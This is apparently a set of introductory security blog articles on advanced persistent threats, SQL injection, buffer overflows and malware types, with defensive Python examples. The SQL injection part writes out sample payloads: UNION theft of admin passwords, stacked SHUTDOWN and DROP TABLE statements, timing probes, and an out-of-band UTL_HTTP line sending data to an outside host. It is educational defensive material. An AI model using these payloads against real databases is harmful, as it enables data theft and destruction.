Have you heard of Advanced Persistent Threat or APT?

Introduction

Advanced persistent threat (APT) is a term referring to organised, targeted attacks on government organisations, officials and businesses, carried out to steal valuable information and/or to damage assets. These attacks require a high degree of knowledge and usually take place over a long period of time.

To understand an APT, it helps to look at the meaning of each word in the term: advanced, persistent and threat. "Advanced" implies that the attacker has a high degree of knowledge and can draw on a large pool of intrusion tools and techniques. "Persistent" describes attacks that are guided and usually occur over a long period of time. Lastly, "threat" implies that a human is involved in the attack rather than only automated tools. (1)

The first section describes the characteristics an attack must have to be considered an APT. Section 2 describes the life cycle of an APT attack. Section 3 describes some of the measures that could be taken to defend against APTs; these are based on the behaviour seen at the beginning and at the later stages of an attack.

1. Characteristics of an APT

An advanced persistent threat attack has three main characteristics: it is targeted, complex and persistent in nature. The following paragraphs describe each characteristic in detail.

Targeted: APT attacks are aimed at a specific company or person to achieve a specific objective. For example, Stuxnet (2) was specifically targeted at Iran's nuclear power station. Night Dragon targeted oil and petroleum companies. The RSA attack targeted information on RSA SecurID (2). Operation Aurora targeted source code at Google, Adobe and other high-profile companies. These are unlike the opportunistic attacks usually seen from hackers; rather, they are well-organised, well-funded attacks aimed at a specific objective. It can be assumed that any company or organisation holding high-value data could be a target.

Complex: APTs usually involve a mixture of attacks, attempting to penetrate the network using different techniques. These may include sending phishing emails to targeted individuals, targeting vulnerabilities in applications, targeting unpatched systems, and exploiting zero-day vulnerabilities. To defend against these complex attacks, a defence-in-depth strategy should be deployed.

Persistent: APTs mainly occur over a long period of time, as the attackers have to gather information about the target and develop specific attack strategies, which may involve finding zero-day vulnerabilities and developing their own tools for the specific vulnerability in the system. Moreover, once the attackers have penetrated the network, they may still find many obstacles to overcome in order to reach their target. These attacks usually span weeks and months.

2. Stages of Advance Persistent Threat

APTs consist of four major stages (note that different authors subdivide these stages further). Each stage may take a long period of time.

  • Reconnaissance: during this stage the attacker attempts to understand the target and its vulnerable points.
  • Penetrate: using the information gathered in the previous stage, the attacker gains access to the target system.
  • Persist and propagate: once the attacker gains access to the network, they install backdoors and propagate further into the network.
  • Data exfiltration or take action: once the attacker reaches the targeted objective, they extract data from the target or do harm to the system.

The following subsections look at each stage in detail.

2.1 Reconnaissance

This is the first stage of an APT. At this stage, the attacker gathers information about the target. It is mainly divided into two sub-stages: passive scanning and active scanning.

Reconnaissance in the narrow sense is also referred to as passive scanning. During this process the attacker finds information about the target by looking at blogs, job advertisements and the corporate website. These sources can reveal information about network devices, software (including anti-virus products), staff and their roles, and technical contact numbers of the target.

Active scanning may involve using automated tools (such as nmap or nikto) to identify potential hosts that could be targeted, looking for open ports and the services running on each host. Note that automated scanning is noisy, and attackers may use other attacks to hide a scan; for example, a DoS attack on the hosts so that the logs are overwritten.

2.2 Penetrate

Once the attacker finds a potential host that is vulnerable, targeted attacks are deployed to infiltrate it. These may involve social engineering techniques, spear-phishing emails, and malware exploiting zero-day vulnerabilities. Note that these attacks are developed specifically for the target and are designed to evade the anti-virus and intrusion detection systems in use by the target.

2.3 Persist & Propagate

Once the attacker has infiltrated the system, special measures are taken to maintain access to it. Some of these measures are:

  • Installing special software (remote-access software) to provide communication between the infiltrated host and the attacker
  • Creating administrative users and taking copies of system password hash files
  • Hiding their presence on the system by deleting system and firewall log files

After taking measures to maintain access to the infiltrated system, further payloads are downloaded onto it to run scans and identify other nodes on the network. This helps the attacker map out the network and find the next system to be penetrated in order to reach the target.

This movement from one system to another to reach the target is referred to as "pivoting". Note that the propagation phase may itself take weeks and months, as further reconnaissance and penetration stages occur while pivoting from system to system.

2.4 Data exfiltration or take action

At this stage, the attacker controls one or more systems at the target and has reached the final system or found the information they wanted. Now the attacker needs to collect the information and send it to an outside server or to another system (assuming the goal of the attack is to obtain data). If the information has to be sent from time to time, this stage can last for months and years, until the attack is detected and stopped. If, on the other hand, the information needs to be sent only once, the attack ends after the data is sent.

In addition, other actions the attacker may take include (3):

  • Holding data for ransom
  • Selling the information to potential buyers; for example, credit card information stolen from large retail shops is sold on the black market
  • Selling or disclosing the attack methods used to compromise the target
  • Disclosing the information and data to the public

3. Detection of APT

Advanced persistent threat attacks occur quietly and are very difficult to detect, so attackers may be present in a compromised system for a long time before they are detected. It is therefore important to be on the alert for any suspicious activity in any of the components on the network.

Some early signs of an APT may involve activities such as: 1) suspicious emails, 2) suspicious connections, 3) files containing shellcode, and 4) anomalous traffic. These can be detected by anti-virus and intrusion detection systems.

Since most APTs are detected long after a system is compromised, intrusion detection systems should also look for activities carried out after a compromise. Activities involved in the later stages can include 1) data access attempts, 2) data transfers and 3) changes in application configurations.
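As an added example (not part of the original article), the script below turns three of the signs just listed into concrete checks run over a constructed connection log: an early-stage sign (one source probing many ports on one host, i.e. noisy scanning), a persistence-stage sign (a host calling an external address at suspiciously regular intervals, as remote-access software does) and a late-stage sign (an unusually large outbound transfer). The log format, the thresholds and all function names are assumptions made for this example; a real deployment would read proxy or flow logs and tune the thresholds to its own baseline.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample connection log for this example (not from a real sensor).
# Each line: timestamp, internal source host, destination, destination port,
# bytes sent outbound.
SAMPLE_LOG = """\
2024-03-01T09:00:00 src=10.0.0.5 dst=203.0.113.9 dport=443 bytes_out=900
2024-03-01T09:01:00 src=10.0.0.5 dst=203.0.113.50 dport=443 bytes_out=5200
2024-03-01T09:04:30 src=10.0.0.5 dst=203.0.113.50 dport=443 bytes_out=800
2024-03-01T09:05:00 src=10.0.0.7 dst=10.0.0.20 dport=21 bytes_out=60
2024-03-01T09:05:01 src=10.0.0.7 dst=10.0.0.20 dport=22 bytes_out=60
2024-03-01T09:05:02 src=10.0.0.7 dst=10.0.0.20 dport=23 bytes_out=60
2024-03-01T09:05:03 src=10.0.0.7 dst=10.0.0.20 dport=25 bytes_out=60
2024-03-01T09:05:04 src=10.0.0.7 dst=10.0.0.20 dport=80 bytes_out=60
2024-03-01T09:05:05 src=10.0.0.7 dst=10.0.0.20 dport=110 bytes_out=60
2024-03-01T09:05:06 src=10.0.0.7 dst=10.0.0.20 dport=135 bytes_out=60
2024-03-01T09:05:07 src=10.0.0.7 dst=10.0.0.20 dport=139 bytes_out=60
2024-03-01T09:05:08 src=10.0.0.7 dst=10.0.0.20 dport=443 bytes_out=60
2024-03-01T09:05:09 src=10.0.0.7 dst=10.0.0.20 dport=445 bytes_out=60
2024-03-01T09:10:00 src=10.0.0.5 dst=203.0.113.9 dport=443 bytes_out=910
2024-03-01T09:17:00 src=10.0.0.5 dst=203.0.113.50 dport=443 bytes_out=12000
2024-03-01T09:18:10 src=10.0.0.5 dst=203.0.113.50 dport=443 bytes_out=300
2024-03-01T09:20:00 src=10.0.0.5 dst=203.0.113.9 dport=443 bytes_out=890
2024-03-01T09:30:00 src=10.0.0.5 dst=203.0.113.9 dport=443 bytes_out=905
2024-03-01T09:35:00 src=10.0.0.9 dst=198.51.100.4 dport=443 bytes_out=40000000
2024-03-01T09:40:00 src=10.0.0.5 dst=203.0.113.9 dport=443 bytes_out=895
2024-03-01T09:52:00 src=10.0.0.9 dst=198.51.100.4 dport=443 bytes_out=35000000
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) bytes_out=(?P<bytes>\d+)$"
)
INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumed internal range

SCAN_PORT_THRESHOLD = 8      # distinct ports on one host from one source
BEACON_MIN_CONNECTIONS = 4   # at least three intervals to judge regularity
BEACON_MAX_JITTER = 0.1      # stdev/mean of the gaps between connections
EXFIL_BYTES = 50_000_000     # total outbound bytes to one external host


def parse_log(text):
    """Parse the constructed log lines into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        records.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "src": m["src"],
            "dst": m["dst"],
            "dport": int(m["dport"]),
            "bytes": int(m["bytes"]),
        })
    return records


def is_internal(host):
    try:
        return ipaddress.ip_address(host) in INTERNAL
    except ValueError:
        return False


def analyse(text):
    """Return a sorted list of (rule, src, dst) findings for the given log text."""
    ports = defaultdict(set)
    times = defaultdict(list)
    volume = defaultdict(int)
    for r in parse_log(text):
        key = (r["src"], r["dst"])
        ports[key].add(r["dport"])
        times[key].append(r["ts"])
        volume[key] += r["bytes"]

    findings = set()
    for (src, dst), seen in ports.items():
        # Early sign: one source touching many ports on one host (noisy scanning).
        if len(seen) >= SCAN_PORT_THRESHOLD:
            findings.add(("port_scan", src, dst))
    for (src, dst), stamps in times.items():
        if is_internal(dst) or len(stamps) < BEACON_MIN_CONNECTIONS:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # Persistence stage: remote-access tooling calling home at fixed intervals.
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) < BEACON_MAX_JITTER:
            findings.add(("beacon", src, dst))
    for (src, dst), total in volume.items():
        # Later stage: unusually large outbound transfer to an external host.
        if not is_internal(dst) and total >= EXFIL_BYTES:
            findings.add(("exfil_volume", src, dst))
    return sorted(findings)


if __name__ == "__main__":
    for rule, src, dst in analyse(SAMPLE_LOG):
        print(f"{rule:13s} {src} -> {dst}")
```

In the constructed log, 10.0.0.5 also talks to 203.0.113.50 at irregular times, and that pair is deliberately not flagged: regularity, not mere repetition, is what separates a beacon from ordinary browsing. The scan is excluded from the beacon rule because its destination is internal, which is why the two signs need separate rules.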

Conclusion

Advanced persistent threats are attacks that are complex, organised and targeted at a specific organisation or individual. Although these attacks are currently carried out by highly skilled hackers, this is going to change as knowledge of APTs spreads among hacker communities, and more organisations are going to fall victim to APT attacks.

The key to defending against an APT is to follow security best practices (such as defence-in-depth strategies), so that the attack is detected early and its impact reduced.

References

  1. Damballa. Advanced Persistent Threats (APTs). Atlanta: s.n., 2010.
  2. Command Five Pty Ltd. Advanced Persistent Threats: A Decade in Review. 2011.
  3. Websense. Advanced Persistent Threats and Other Advanced Attacks. 2011.

Do you know SQL Injection or you just think you know it?

That is the question with which the lecturer started. I wondered if I really know it too. So here I am writing what I know of SQL injection; maybe someone else can help me out with the things I get wrong or give me more insight into the topic.

Introduction

SQL injection is an attack in which the attacker passes SQL statements from the client to the server for execution. If the injected statement executes successfully, it may result in a data breach, leaking information that the developer did not intend to expose. In addition, the attacker may be able to insert, delete or update rows in the database.

SQL injection attacks can be divided into a few categories, based on how the result of the statement's execution is returned or on how the statements are formed. Below are the categories of SQL injection this article looks into.

  1. Tautologies
  2. Union Queries
  3. Piggy-back queries
  4. Timing attacks
  5. Alternative Encoding
  6. Out of band attacks
  7. Illegal/Logically incorrect Queries

Tautologies

This attack uses a boolean condition that always evaluates to true (or always to false), regardless of the value the query was meant to test.

select * from users where username = 'abc' or 1 < 2 --'

The above example always evaluates to true, because 1 < 2 holds for every row; the trailing comment marker (--) neutralises the closing quote the application itself appends, so the statement stays syntactically valid and every row of the users table is returned.

Union Queries

Union queries work by combining the results of two separate queries, which may take data from different tables or views.

select * from users where userId = $id

The id value is manipulated by the user by appending a union query (both SELECTs must return the same number of columns for the union to be accepted):

$id= 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

This results in the following query:

select * from users where userId = 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

This returns the combined result of both queries, so the rows of AdminUsers appear alongside the rows of users.

Piggy-back queries

Piggy-back queries are queries appended to an existing query, resulting in more than one statement being executed; in the example below SHUTDOWN is a SQL Server statement that rides on the original SELECT.

select * from users where userId = 1; SHUTDOWN;

The above statement contains two queries; the developer could check for such stacked statements before executing the SQL.

Timing attacks

Timing attacks are very useful to an attacker when database and application error output is switched off; they are a form of blind SQL injection. The attacker appends a database timing function to the original query and checks whether it executed by measuring the server's response time. If the server responds immediately, the timing function did not run; if the response is delayed, the database is vulnerable to this type of attack.

select * from users where userId = 1 and sleep(15);

Alternative Encoding

In this type of attack, the SQL text is encoded to evade detection by defensive coding (such as filters that look for quoted strings or particular literals). These attacks are hard to detect, but some of the keywords used in this approach can be identified. The MySQL examples below each build a value from function calls rather than writing it as a plain literal, and each condition is a tautology:

select * from members where id=1 OR 'ABC' = concat(conv(10,10,36),
                            conv(11,10,36),conv(12,10,36));
select * from members where id=1 OR 'abc' = char(97,98,99);
select * from members where id=1 OR ascii('a') = 97;
select * from members where id=1 OR ceil(pi())=4;
select * from members where id=1 OR floor(pi()*pi()+pi())=13;

Out of band attacks

This is also a very useful technique for a blind SQL injection attacker. The attacker uses DBMS functions to execute a command that results in an out-of-band connection (a separate network channel, opened by the database server itself) carrying the results to the attacker. For example, the attacker could use this technique to have user information sent out by email. The Oracle example below uses UTL_HTTP.request to make the database server issue an HTTP request containing the result of the inner query:

select * from users where userId = 10||UTL_HTTP.request('testerserver.com:80'||(SELECT user FROM DUAL))--

Illegal/Logically incorrect Queries

This is also known as error-based SQL injection. This type of attack helps the attacker when other types, such as union queries, are not useful. It is also very helpful at the reconnaissance stage of an attack, where the attacker submits an illegal query to see the resulting output; the error message may reveal information about the backend database system.

select * from users where userId = ' --

The above query results in an error message. To guard against this type of attack, detailed error messages should be switched off on production databases and applications.
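As an added example (not part of the original article), the Python script below reproduces the tautology, union, piggy-back and error-based cases above against an in-memory SQLite database and shows the defence that addresses all of them at once: binding the user value as a parameter instead of splicing it into the SQL text. The table layout, the sample rows and the function names are assumptions made for this example, and the payloads are constructed to mirror the article's examples.

```python
import sqlite3


def make_db():
    """In-memory SQLite database with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, email TEXT);
        INSERT INTO users VALUES ('alice', 'alice@example.test'),
                                 ('bob',   'bob@example.test');
        CREATE TABLE admin_users (username TEXT, password_hash TEXT);
        INSERT INTO admin_users VALUES ('root', 'constructed-hash-value');
    """)
    return conn


def lookup_vulnerable(conn, username):
    """The pattern the article's examples attack: untrusted text spliced into SQL."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Same lookup with a bound parameter: the value can never become SQL syntax."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def piggyback_rejected(conn, username):
    """True if the driver refuses a stacked second statement in the spliced query.

    Python's sqlite3 execute() accepts exactly one statement (older versions
    raise Warning, newer ones ProgrammingError); executescript() would not.
    """
    try:
        lookup_vulnerable(conn, username)
        return False
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return True


def leaked_error_text(conn, username):
    """The raw engine error a naive handler would echo to the client, or None."""
    try:
        lookup_vulnerable(conn, username)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    # Constructed payloads mirroring the tautology, union and piggy-back sections.
    tautology = "abc' OR '1'='1"
    union = "abc' UNION ALL SELECT username, password_hash FROM admin_users --"
    stacked = "abc'; DROP TABLE users; --"
    print("tautology, concatenated :", lookup_vulnerable(db, tautology))
    print("tautology, parameterised:", lookup_safe(db, tautology))
    print("union, concatenated     :", lookup_vulnerable(db, union))
    print("union, parameterised    :", lookup_safe(db, union))
    print("stacked query rejected  :", piggyback_rejected(db, stacked))
    print("error text leaked       :", leaked_error_text(db, "'"))
```

With parameters bound, every payload is simply compared against the username column as data and matches nothing, so no special-casing of quotes, UNION or semicolons is needed. The piggy-back case also shows that driver behaviour is part of the defence: execute() rejects a second statement, but a handler built on executescript() would run it, so that API should never see untrusted input.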

There is one more type of SQL injection, called stored procedure injection, in which the parameters passed to a stored procedure are modified to obtain results.

Hope this article is informative.

What is a buffer overflow?

Introduction

A buffer overflow happens when more data is written to a buffer than it was allocated to hold. The excess data overwrites adjacent memory, which may include addresses and other control data that the computer later acts on. A buffer overflow could crash the application, and could also be exploited by an attacker to execute any command they want.

Types of Buffer Overflow

  • Stack Overflow
  • Heap Overflow

Prevention Mechanisms

  • Use higher-level programming languages that are strongly typed and disallow direct memory access
  • Stack canary (stack cookie): a data pattern written to the stack just before the saved return address, the value that will be loaded into the EIP register (EIP holds the address of the next instruction); if an overflow overwrites the canary, the corruption is detected before the return address is used
  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)

Malware – an introduction and classification

Malicious software, or malware, refers to programs that exploit vulnerabilities in a computing system for a harmful purpose. These programs can be divided into categories based on their behaviour or function: for example, whether they require a host program, or whether the software copies itself. In the following sections I look into the main categories of malware.

Virus

A virus is a piece of program code which is self-replicating and injects itself into programs installed on the system. Viruses can be further classified into four types.

Resident virus: this type of virus embeds itself in the memory of the target host, in such a way that it becomes active every time the OS starts or executes a specific action.

Non-resident virus: when executed, this type of virus actively seeks targets to infect on local, removable or network locations. After infecting them it exits, hence it does not reside in memory.

Boot sector virus: this type of virus specifically targets the boot sector of the host's hard drive. Once the drive is infected, the virus is loaded into memory every time an attempt is made to boot from it.

Macro virus: macro viruses are written in a macro language and embedded in Word, Excel or Outlook documents. They are executed as soon as the document is opened.

Worm

Worms are also considered a subdivision of viruses, as they are also self-replicating. Unlike viruses, worms exploit network and operating system vulnerabilities to spread, and they do not require any user interaction to replicate. This capability makes worms more dangerous.

Trojan horse

Unlike viruses and worms, a Trojan horse has no self-replication capability. Trojans are programs that pretend to be legitimate but are designed to carry out malicious actions when run. They may come in the form of free software, games, videos, etc.

Backdoor (Remote Administration Tool)

A backdoor or remote administration tool (RAT) is a piece of software that gives a person access to a computer without the owner's consent. Depending on the capabilities of the RAT, attackers can run or install the software they need to cause damage.

Rootkit

A rootkit is a piece of software designed to hide its presence and actions from users and anti-virus software. It is able to do this through deep integration with the operating system; these rootkits start before the OS starts. Rootkits help attackers maintain root-level access to the compromised system.

Bots and Botnets

Bots are programs created to perform specific operations. While some bots are created for harmless purposes (such as video gaming or Internet auctions), it is becoming increasingly common for bots to be used for malicious activities. Bots are used in botnets (collections of computers controlled by a third party) for DDoS attacks, as web spiders that scrape server data, and for distributing malware.

Spyware

Spyware is software that monitors a victim's activities, gathers other information from the victim's computer and sends it back to its creator.

Ransomware

Ransomware is malware designed to extort money from its victims. It can arrive as a pop-up, a phishing link or a malicious website, and once acted on it triggers a vulnerability in the user's system, locking the keyboard and screen, and sometimes the entire computer. It is intended to scam people by falsely accusing the victim of a crime and demanding payment of a fine.